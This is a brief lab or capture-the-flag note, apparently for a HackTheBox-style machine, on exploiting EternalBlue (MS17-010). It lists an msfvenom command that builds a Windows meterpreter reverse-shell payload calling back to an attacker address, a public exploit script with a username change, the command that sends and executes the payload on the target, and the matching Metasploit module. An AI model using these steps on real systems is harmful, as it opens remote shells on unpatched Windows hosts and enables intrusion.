EternalBlue

$ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.9 lport=8888 -f exe > writeup.exe
https://github.com/helviojunior/MS17-010.git
Use -> send_and_execute.py
Change -> USERNAME = '\\'

$ python send_and_execute.py 10.10.10.40 ../writeup.exe 
Metasploit -> windows/smb/ms17_010_eternalblue